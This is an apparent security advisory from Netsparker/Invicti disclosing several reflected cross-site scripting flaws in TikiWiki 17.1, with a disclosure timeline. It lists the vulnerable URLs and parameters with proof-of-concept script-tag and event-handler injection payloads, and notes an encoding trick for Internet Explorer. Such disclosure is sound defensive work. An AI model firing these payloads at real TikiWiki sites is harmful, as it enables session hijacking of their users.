Multiple Cross-site Scripting Vulnerabilities in TikiWiki 17.1

Information

Advisory by Netsparker (now Invicti)
Name: Cross-site Scripting Vulnerabilities in TikiWiki
Affected Software: TikiWiki
Affected Versions: 17.1
Homepage: https://tiki.org/tiki-index.php
Vulnerability: Cross-site Scripting  Vulnerabilities
Severity: High
Status: Fixed
Invicti Advisory Reference: NS-18-010

Technical Details

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name: dbhost
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x0023B8)%3c%2fscRipt%3e

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name: dbhost
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x005AF2)%3c%2fscRipt%3e

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php
Parameter Name: email_test_to
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x001E5A)%3c%2fscRipt%3e

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name: email_test_to
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x0023B5)%3c%2fscRipt%3e

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name: dbuser
Parameter Type: POST
Attack Pattern:  %3cscRipt%3enetsparker(0x005AF6)%3c%2fscRipt%3e

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php
Parameter Name: dbhost
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x001E5C)%3c%2fscRipt%3e

URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php?'"--></style></scRipt><scRipt>netsparker(0x0015D8)</scRipt> (IE ONLY)
Notes: For successful exploitation, payload may need to be sent without URL encoding. Modern browsers will encode the HTML tags in the request before it is being sent to the webserver, however it is still possible in Internet Explorer.
Proof URL: http://app.scan/ScanApp/tiki-17.1/tiki-check.php?'"--></style></scRipt><scRipt>alert(0x0015D8)</scRipt>
Parameter Name: Query Based
Parameter Type: Query String
Attack Pattern: '"--></style></scRipt><scRipt>netsparker(0x0015D8)</scRipt>

URL: http://app.scan/ScanApp/tiki-17.1/tiki-install.php
Parameter Name: email_test_to
Parameter Type: POST
Attack Pattern: x%22+onmouseover%3dnetsparker(0x0015DC)+x%3d%22

For more information on cross-site scripting vulnerabilities read the section Cross-site scripting (XSS).

Advisory Timeline

5th October 2017 – First Contact
1st March 2018 – Vendor Fixed
12th July 2018 – Advisory Released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.